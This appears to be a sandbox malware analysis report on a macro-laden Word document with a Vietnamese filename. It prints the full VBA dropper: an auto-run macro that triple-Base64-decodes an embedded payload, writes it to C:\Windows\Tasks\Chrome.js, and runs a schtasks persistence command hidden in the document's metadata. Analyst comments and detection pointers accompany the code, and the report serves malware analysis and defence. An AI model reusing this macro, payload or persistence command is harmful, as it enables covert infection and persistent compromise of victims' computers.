b22d7b19...e617 | Files
VTI SCORE: 100/100
Dynamic Analysis Report
Classification: -

b22d7b196ca03b43f9b140732a3d317f328e5d5f53379c2520a0f05a17d6e617 (SHA256)

CV gui PVN vv y kien cua UB ve gia han.doc

Word Document

Created at 2019-01-08 12:39:00

Filters:
Filename Category Type Severity Actions
C:\Users\aETAdzjz\Desktop\CV gui PVN vv y kien cua UB ve gia han.doc Sample File Word Document
Suspicious
»
Mime Type application/vnd.openxmlformats-officedocument.wordprocessingml.document
File Size 23.34 KB
MD5 f4e23cf5d4eb9068e7e3ba617cae9088
SHA1 3b55440f396b9c688c1724181e1780098c95bddc
SHA256 b22d7b196ca03b43f9b140732a3d317f328e5d5f53379c2520a0f05a17d6e617
SSDeep 384:/imtTYZvzQagj1JYfXfosEOWJIJwMlH7lVqsLWqUoWCtqRK+A8yC2jBJv3:/L20dj1IPnEOtH7aqUzCtqRK+UCE33
Parser Error Remark Static analyzer was unable to completely parse the analyzed file
Office Information
»
Description cmd /c schtasks /create /sc MINUTE /tn "Chrome" /tr "C:\Windows\Tasks\Chrome.js" /mo 2 /F & schtasks /create /sc MINUTE /tn "Chrome" /tr "C:\Windows\Tasks\Chrome.js" /mo 2 /RU SYSTEM
Creator A
Last Modified By Win7
Revision 7
Create Time 2019-01-04 01:08:00+00:00
Modify Time 2019-01-08 15:02:00+00:00
Document Information
»
Application Microsoft Office Word
App Version 16.0000
Template Normal
Document Security SecurityFlag.NONE
Editing Time 18.0
Page Count 1
Line Count 10
Paragraph Count 2
Word Count 222
Character Count 1269
Chars With Spaces 1489
Heading Pairs Title
ScaleCrop False
SharedDoc False
VBA Macros (1)
»
Macro #1: ThisDocument
»
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function Base64Decode(B64 As String) As String
    ' Analyst note: hand-rolled Base64 decoder embedded in the macro. It takes a
    ' Base64 string and returns the decoded bytes as a String built with Chr().
    ' The macro's Document_Open handler calls it three times in a row on the
    ' embedded literal, so the payload is only readable after three decode passes.
    '
    ' Any runtime error jumps to the "over" label at the end. The return value is
    ' only assigned in the final loop, so an error before that point returns an
    ' empty string rather than raising to the caller.
    On Error GoTo over
    Dim OutStr() As Byte, i As Long, j As Long
    ' Alphabet lookup table; a character's position (minus 1) is its 6-bit value.
    Const B64_CHAR_DICT = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="
    ' Cut the input at the first "=" so padding is never looked up.
    If InStr(1, B64, "=") <> 0 Then B64 = Left(B64, InStr(1, B64, "=") - 1)
    Dim kk, length As Long, mods As Long
    ' mods = number of leftover characters after the last full 4-character group;
    ' length = number of characters that belong to full groups.
    mods = Len(B64) Mod 4
    length = Len(B64) - mods
    ' Output size: 3 bytes per full group plus 1 (mods = 2) or 2 (mods = 3) tail bytes.
    ' NOTE(review): Switch has no case for mods = 1; presumably that raises and exits
    ' through the error handler - confirm.
    ReDim OutStr(length / 4 * 3 - 1 + Switch(mods = 0, 0, mods = 2, 1, mods = 3, 2))
    For i = 1 To length Step 4
        Dim buf(3) As Byte
        ' Map the four characters of this group to their 6-bit values.
        ' NOTE(review): InStr returns 0 for a character outside the alphabet, giving -1;
        ' storing that in a Byte presumably raises and exits via "over" - confirm.
        For j = 0 To 3
            buf(j) = InStr(1, B64_CHAR_DICT, Mid(B64, i + j, 1)) - 1
        Next
        ' Repack 4 x 6 bits into 3 output bytes.
        OutStr((i - 1) / 4 * 3) = buf(0) * &H4 + (buf(1) And &H30) / &H10
        OutStr((i - 1) / 4 * 3 + 1) = (buf(1) And &HF) * &H10 + (buf(2) And &H3C) / &H4
        OutStr((i - 1) / 4 * 3 + 2) = (buf(2) And &H3) * &H40 + buf(3)
    Next
    ' Tail handling: 2 leftover characters yield 1 byte, 3 leftover characters yield 2 bytes.
    If mods = 2 Then
        OutStr(length / 4 * 3) = (InStr(1, B64_CHAR_DICT, Mid(B64, length + 1, 1)) - 1) * &H4 + ((InStr(1, B64_CHAR_DICT, Mid(B64, length + 2, 1)) - 1) And &H30) / 16
    ElseIf mods = 3 Then
        OutStr(length / 4 * 3) = (InStr(1, B64_CHAR_DICT, Mid(B64, length + 1, 1)) - 1) * &H4 + ((InStr(1, B64_CHAR_DICT, Mid(B64, length + 2, 1)) - 1) And &H30) / 16
        OutStr(length / 4 * 3 + 1) = ((InStr(1, B64_CHAR_DICT, Mid(B64, length + 2, 1)) - 1) And &HF) * &H10 + ((InStr(1, B64_CHAR_DICT, Mid(B64, length + 3, 1)) - 1) And &H3C) / &H4
    End If
    ' Build the return string one character per decoded byte.
    For i = 0 To UBound(OutStr)
        Base64Decode = Base64Decode & Chr(OutStr(i))
    Next i
over:
End Function

Private Sub Document_Open()
    ' Analyst note: Document_Open is the Word auto-run event handler, so this code
    ' executes when the document is opened with macros enabled.
    '
    ' Behaviour visible in this listing:
    '   1. strBs0 holds a long literal that is passed through Base64Decode three
    '      times (strBs1 -> strBs2 -> strBs3).
    '   2. The final result is written to C:\Windows\Tasks\Chrome.js.
    '   3. The value of the document's built-in "Comments" property is passed to Shell.
    '
    ' The report's Office Information "Description" field shows a
    ' "cmd /c schtasks /create ..." command that registers a task named "Chrome"
    ' running C:\Windows\Tasks\Chrome.js every 2 minutes, with a second variant
    ' using /RU SYSTEM. Presumably that field is the Comments property read
    ' below - confirm against the document's core properties.
    '
    ' Detection and triage pointers for defenders:
    '   - an Office process creating a script file under C:\Windows\Tasks
    '   - an Office process spawning cmd.exe / schtasks.exe
    '   - a scheduled task named "Chrome" whose action is a .js file rather than a browser binary
    '   - a command line stored in document metadata instead of in the macro body,
    '     so reviewing the macro text alone does not reveal what Shell executes
    Dim strBs0 As String
    Dim strBs1 As String
    Dim strBs2 As String
    Dim strBs3 As String
    ' Encoded payload literal (kept exactly as captured in the report).
    strBs0 = "WkcxR2VVbEhUVGxLTWs1SVQxUk9ZVmRGY0RaWlZXUlhZekpLUkZGWVVtbGlWR3d6VTFWTmVHSkhWa2hXYlhCS1VqQnZNVmt3WkVkbGJVNDFVVmhTV21WVlJuQlRhMmhLVDFaam" & _
            "VGUnFWbXBOTVVweldXeE5NVlF4Y0ZsVldGWlhUV3hhY0ZaWE1WZGxSMUpZVm01d2ExSnFRVEpVTW5SUFpWWndXRkpxUW1GVk1tUjFXVlZvVTAxSFRrVmlNMXBOWld0VmVGUnJUV" & _
            "EJsUlRWd1RraHdUMlZVVWpSVVYzQktaR3hKZVU5WVdtRk5ibWh6Vm14b1EyRXhiRmxWYlhoTlRWWmFNMWRyWkVkTlJuQlVUbGhrYUZORlJuVlRNVko2V2pCd1NWTnRlR3BOTUVV" & _
            "MVUydG9TbVJXU1hsV2FrSldZbFphTmxrd1l6VmtWMDE1VmxjNVRGWklUbkpaTWpGWFpXMU9TVlJxUW1waVZscHZXV3hSZDJFeVRuUldibkJxVVhwV1NWZHNhRk5WTVhCWlZHNWt" & _
            "hVTFxVmpaWGJGcFBUVWRPZEZadGFHbFZNbVIzVkROc1FtRXlUWHBUVkd4cFlsWlplbFJHWXpWaFYwWjBWbTF3YTFFd1NsVmFWbWhQVFVad1dFMUlWbFJXVkdneFZsUk9VMlZXY0" & _
            "ZoU2JsSldZbFphYjFkclpGZGxWV3hFVlc1c1lWZEZOVE5aZWs1VFpWWndXRkp1VWxCbFZVWnlWVlJKZUdFeFFsUlZibkJxWVZSV1ZGZHNaRWRoTVZwSVQxVmFhV0pXUm5aVE1WS" & _
            "jZZVEZGZVUxWGRGRldibEpWV2xab1QwMUdjRmhOU0ZaWFVqRlpNRnBGVFRGU2JVcDBWRzVhWVZJeWVERlhha1YzVG1zNWMxWnNWbE5oYldReFZXcEtWMDFHVlhwVmJteG9WbnBX" & _
            "ZFZNd1dqQldSMVpaVkdwQ1lWWjZRakZWVkVrMVpGZFNkRlp1Ykd0U2FrRXlWREowWVdWWFNYbE5WVTVhVjBVMWMxUnRjRk5XUjFKSlUyNUNhV0pYVG5aVGExWlBaRVp3UkdFelF" & _
            "sQmxWVVp5VjFSSmVHRXhVWHBXYWtKUlZsZDRNVnBITURWamJIQlVUVlZhYkZORlNqVlhiR2hQWlcxR1dFOVlWa3BSZWtaRldXcEplR1JHYkZoT1YzUlFZVlpLUlZsc1pGTlBSbE" & _
            "Y2Vm1wQ1RWWnJOSGRaTWpGelpGWndObU15ZEZaaVZscEZXV3hrVWs5V1kzZFVibHBwWW14d2Mxa3lOVk5hUlRseFkwWldhVTFGY0c5WmVrcFdUV3MxUjFScVFtcGlWM2d4VjI1c" & _
            "2IxbHNWWHBpU0hCclVqRmFNRlJIZUZOaVIxWkpWVmhXVTFaNlZuRlpha3BUWTBkS2RGcEhVbEJoYmtKWFZtdFdXazVGZUhKYVIzaHJVbFZ2TVZwRlpGZGxhM1JFVlcxd2FWWXhT" & _
            "bEZhUm1oU1kwVjBWV015ZEd0WFJscDNWMnRSZUZOdFNuVlhibHBvVFd4V01GVnNhRzlrTWs1MFZtNXdhazF0ZURKWmJXeENaRVpGZVU5WVVtbFdNRm94VjJ0U2RtSnRVWGxOV0V" & _
            "KYVpWVktjVmw2VGtObFYwbDVWV3BHV2sweFJtNVhha3BYVFVWc1NWWnFSbWhXTVVaMVdtdFZOVTFYVWtSTlZsSnJVMFZ3ZDFsdE1XcE9NSEJIVTIxNGExWXllSEpWUmxvd1VrZE" & _
            "plVTVVU21GWFJXOTNWMFpTZGs1c1draFBWVTVhVjBVMWMxUnRjRk5XUjFKSlUyNUNhV0pYVG5aV2VrWlBUbGROZWxWdGVHbFZlbFpXVjJ4b2IwMUZlSEpXYmxaYVRXcHNjbGxXW" & _
            "XpGaWJHaFZZbnBhVjFac1NraFVNRTB4VTBad1dWVnJUbXhYUmtweldUTnNibUV5VWxsV2JrSmhVVEowZDFRemJGTlZWMUpaVkc1T1VWVXdSblZaVldoVFRVZE9SV0l6V2sxbGEx" & _
            "VjRWR3ROTUdWRk5YQk9TSEJQWlZSU05GUlhjRXBrYkVsNVQxaGFZVTF1YUhOV2JHaERZVEZzV1ZWdGVFMU5SMUl5V1dwS2EyTXhjRlJPV0dSb1UwVkZkbFpHWkVkaGJFSlVXWHB" & _
            "rUzFKclNYaFpla296VDFWd1IxRnFSbXBOYm1SNVUydGFTMkpIVWxoaVIzUlFaVlpLVWxwR2FFOWpNVUpVVld4R2ExZEZOWHBUTTJ4cVRERktTRkpxUWxwV1JFSjFWRE5zVTFWWF" & _
            "VsbFViazVSVlRGS1VscEdhRTlqTUhRMVZXeE9ZVlpWTlRCWGExSXdXV3hWZW1KSWNHdFNNVm93VkVkek1XSkhVa1JPVm1oaFZqQndWRmRzYUVkTlZuQlpWR3BDV1ZVeFNYcFhiR" & _
            "1JMVlRGd1dWSnFSbUZYUlRSM1ZVWmFNRlpIVmxsVWFrSmhWbnBDTVZaSE1WZE5SWGh6V2tkNFdtSkZjSE5aTVdoWFlrZE5lbFZ0VWxCaGJrSkZXVEl4VjJGSFVraFdWemxMVW10SmVGbDZTak5qUlRrMVZXcE9ZVll3Y0ZSWGJHaEhUVlp3V1ZScVFrMWhla1p6V2tWa2IyUnNjRVZOUnpWV1VsUnNWVlpyVG1wT01IQkpXa2Q0V21KRmNITlpNV2hYWWtkTmVsVll" & _
            "WbE5OYkZsM1ZsY3hWMlZ0VGtoUFdGWnFUV3hXZGxNeFVucGhWVGt6VUZRd2JrOTNjRVZSYWxrd1NVUXdaMXB1Vm5WWk0xSndZakkwYjJONWEyZGxkMjluU1VOQloyUnRSbmxKUjFVNVpUTXdjMkZUZUdsUVZFRnpXWGw0TkV4SGR6bE5RM2hvVEVoSk9VcDVZM05rZWpGVVpFaEtjR0p0WTNWYWJrcDJZbFZPYjFsWVNrUmlNbEpzVEVWM09XTjVOWE5hVnpWdVpFZ" & _
            "G5OME5wUVdkSlEwSXlXVmhKWjFGVU1HbFJWVXBFVWtWV1IxSXdhRXBUYTNSTlZGVTFVRlZHUmxOVk1WSldWbXhrV1ZkV2NHaFpiVTVyV2xkYWJtRkhiSEZoTW5oMFltMDVkMk5ZU25wa1NGWXlaRE5vTldWcVFYaE5hazB3VGxSWk0wOUVhM0pNZVVrM1EybEJaMGxEUW0xaU0wbHZZVlF3ZDA4eWF6aE9hbEUzWVZOemNrdFlkR3hYTUVWMVdUSm9hR05yUmpCTFI" & _
            "ydHdXRlF4Y0U4ek1FdEpRMEZuU1VkYWRtTnBhRFJRVkVFM1pVUjRUVTh6WjNKTGVXdzNRMmxCWjBsRFFXZEpRMEZuV1hveGJGY3pUWFZaTW1ob1kydEdNRXRJWjNCWVZIUnBVRk5vYVZCRWR6SkxVM1JxVHpKM2NsQlVXVGREYVVGblNVTkJaMGxEUVdka01taHdZa2RWYjJKRU5EbFBRMnczUzBOb2FGQlRhR2xRYWpRclMwZDNkRkJVWjNCTFUxbDNaVWRhYlV0W" & _
            "WVEaExTR2M0UzBWM2RFMXBhM0JMVTFsdFMwaEpjbEJZWTI5WlUydHdUek13UzBsRFFXZEpTREJMU1VOQlowbElTbXhrU0ZaNVltbENlVTkzY0RsUGQzQXlXVmhKWjJJeVNuRlZNbWhzWWtkM09XSnRWak5KUlVacVpFZHNNbHBXYUZCWmJYQnNXVE5SYjBsc1pGUlpNMHB3WTBoUmRWVXlhR3hpUjNkcFMxUnpTMlJ0Um5sSlIyeFRXbGhTTVdOdE5VUmlNbEpzVUZ" & _
            "jNWFXRnNUbTlhVjNoelRHeEtNV0pwYUVWUmFsa3dTMGROY0V4RVFYTmFiVVp6WXpKVmNFOTNQVDA9"
    ' Three nested decode passes: each call's output is itself Base64 text.
    strBs1 = Base64Decode(strBs0)
    strBs2 = Base64Decode(strBs1)
    strBs3 = Base64Decode(strBs2)
    ' Writes the decoded text to the VBA Immediate window; has no effect on disk.
    Debug.Print strBs3
    
    ' Drop the decoded text to disk. CreateTextFile(path, overwrite, unicode):
    ' both flags are True, so an existing file is replaced and the output is
    ' written as Unicode. The report lists this path as a Created File.
    Dim fso As Object
    Set fso = CreateObject("Scripting.FileSystemObject")
    Dim Fileout As Object
    Set Fileout = fso.CreateTextFile("C:\Windows\Tasks\Chrome.js", True, True)
    Fileout.Write strBs3
    Fileout.Close
    
    ' Walk the built-in document properties and execute the "Comments" value as a
    ' command line via Shell. The command itself is not present in the macro text.
    Dim dp As DocumentProperty
    For Each dp In ActiveDocument.BuiltInDocumentProperties
    If dp.Name = "Comments" Then
    Shell (dp.Value)
    End If
Next
End Sub

YARA Matches
»
Rule Name Rule Description Classification Severity Actions
VBA_Create_File VBA macro contains file creation commands; possible dropper -
3/5
VBA_Create_File VBA macro contains file creation commands; possible dropper -
3/5
49d2bc305daf1fcca84d6a282e52d1dfd2d79e9ca9f96a3a435d058ae2d8f755 Embedded File XML
Whitelisted
»
Parent File C:\Users\aETAdzjz\Desktop\CV gui PVN vv y kien cua UB ve gia han.doc
Mime Type application/xml
File Size 0.92 KB
MD5 87194dbc6219667d2f15d48641cb9b25 Copy to Clipboard
SHA1 b8950e9aaf341313ac570d6082b7b80271568ab2 Copy to Clipboard
SHA256 49d2bc305daf1fcca84d6a282e52d1dfd2d79e9ca9f96a3a435d058ae2d8f755 Copy to Clipboard
SSDeep 24:2dtWa6ffa7b6flYR7a6flYIO7V4+Q0HpQ7u6flYq7o26flY6J67Q6flYKJ:c01naX6NYRG6NYVh7Q0HpQS6NYqN6NY/ Copy to Clipboard
File Reputation Information
»
Severity
Whitelisted
First Seen 2013-04-24 20:22 (UTC+2)
Last Seen 2018-08-16 17:44 (UTC+2)
c97833e6456aa2bfe9be614f9c3ae41a8ef764b1cc3af92c6a6f273c62309122 Embedded File XML
Whitelisted
»
Parent File C:\Users\aETAdzjz\Desktop\CV gui PVN vv y kien cua UB ve gia han.doc
Mime Type application/xml
File Size 0.27 KB
MD5 dd79e6440b0515bfcf771c2c5286a2c8 Copy to Clipboard
SHA1 40dc1e00e2663cb33f8c296cdb0cd52fa07a87b6 Copy to Clipboard
SHA256 c97833e6456aa2bfe9be614f9c3ae41a8ef764b1cc3af92c6a6f273c62309122 Copy to Clipboard
SSDeep 6:TMVBd6OjzmC3mUifmReUdzXxjmUA+DYQXzReYX9v48sEJ:TMHdtWa6fmEUdzXV4+DYQDEEQWJ Copy to Clipboard
File Reputation Information
»
Severity
Whitelisted
First Seen 2012-11-16 07:03 (UTC+1)
Last Seen 2019-01-06 12:21 (UTC+1)
C:\Windows\Tasks\Chrome.js Created File Text
Unknown
»
Mime Type text/plain
File Size 3.17 KB
MD5 c98b305f90a412362e54fd297afb3674 Copy to Clipboard
SHA1 4705c1151fe5db668f2a3e9f84d78bf63a018555 Copy to Clipboard
SHA256 31467c1f93ba3f47e5343d5c4b3899533d3270bee868831016b8c4aee3e6cc6f Copy to Clipboard
SSDeep 48:XPlZP0/tdyoNWbdmjpQ11gC9WlB4lLdyTlpL+JKyfNayAT7W1nM7jlcqKJqmTdzq:XPySoQUjpQ1Uam7wKyf8Z/EwjRadu Copy to Clipboard
5312661b9e1d78deefa38ba96b6ffa090d005472235ff083b54dde9d73a56276 Embedded File Text
Unknown
»
Parent File C:\Users\aETAdzjz\Desktop\CV gui PVN vv y kien cua UB ve gia han.doc
Mime Type text/plain
File Size 2.82 KB
MD5 9a30f764affd2f9a589fbf2670d43f14 Copy to Clipboard
SHA1 22523d62a4974dd3752e10ee59bad6baba1652a0 Copy to Clipboard
SHA256 5312661b9e1d78deefa38ba96b6ffa090d005472235ff083b54dde9d73a56276 Copy to Clipboard
SSDeep 48:SsNtQZdebdnl0TlWsG/k1p1GC1lqt70H27fjhpF/kalgm0gAUg+2TOFD/YGekQEi:dNtQZdqhl0pyqGa4oWLjhUalgmIwqOJa Copy to Clipboard
52262bb315fa55b7441a04966e176b0e26b7071376797e35c80aa60696b6d6fc Embedded File Unknown
Unknown
»
Parent File C:\Users\aETAdzjz\Desktop\CV gui PVN vv y kien cua UB ve gia han.doc
Mime Type application/CDFV2-unknown
File Size 19.50 KB
MD5 c1daaca5741e9ced785d683a05216f7c Copy to Clipboard
SHA1 ec8deede59e81a841145333b66c3253c591c4142 Copy to Clipboard
SHA256 52262bb315fa55b7441a04966e176b0e26b7071376797e35c80aa60696b6d6fc Copy to Clipboard
SSDeep 384:8tR/+qmHdHhpwiZ2Dw/vVT1x+Gwmoq18PAY0jm5Xd:aadEiZaABx+pqqPxh5Xd Copy to Clipboard
b6a2282545ac0eac69c91f9092d9109c993527d1f0e03b0457acc5721fe12175 Embedded File XML
Unknown
»
Parent File C:\Users\aETAdzjz\Desktop\CV gui PVN vv y kien cua UB ve gia han.doc
Mime Type application/xml
File Size 6.00 KB
MD5 bc1dc70defcb712cedde2fc2c491e537 Copy to Clipboard
SHA1 52a9e73cca1e94543d95a37544377563e1f2ce1e Copy to Clipboard
SHA256 b6a2282545ac0eac69c91f9092d9109c993527d1f0e03b0457acc5721fe12175 Copy to Clipboard
SSDeep 96:vmWc6mmY+bzZliSwT/iZo0SXTbreegvIVpG5JMMPrWBmHgQ9lys0ujRVVvkXyH7Z:XxmmY+Zsy4EO0R7J Copy to Clipboard
81d22ccf51ee4c30533dd16600b90ae1b17310ec88d17348eccba08cdb4528eb Embedded File XML
Unknown
»
Parent File C:\Users\aETAdzjz\Desktop\CV gui PVN vv y kien cua UB ve gia han.doc
Mime Type application/xml
File Size 2.53 KB
MD5 5dbb2ecb942432e9ac1b6b7b9dafd595 Copy to Clipboard
SHA1 8703bcaedb7a87453949a2be32f73e27f33bc59a Copy to Clipboard
SHA256 81d22ccf51ee4c30533dd16600b90ae1b17310ec88d17348eccba08cdb4528eb Copy to Clipboard
SSDeep 48:ciec6mNYYNEbliS+B1+4+kXoM+YqM+IyM+wM+VdzlcAayVKggYTjvgD0:+c6mmY+bliSwTNXN9xbue8ggaF Copy to Clipboard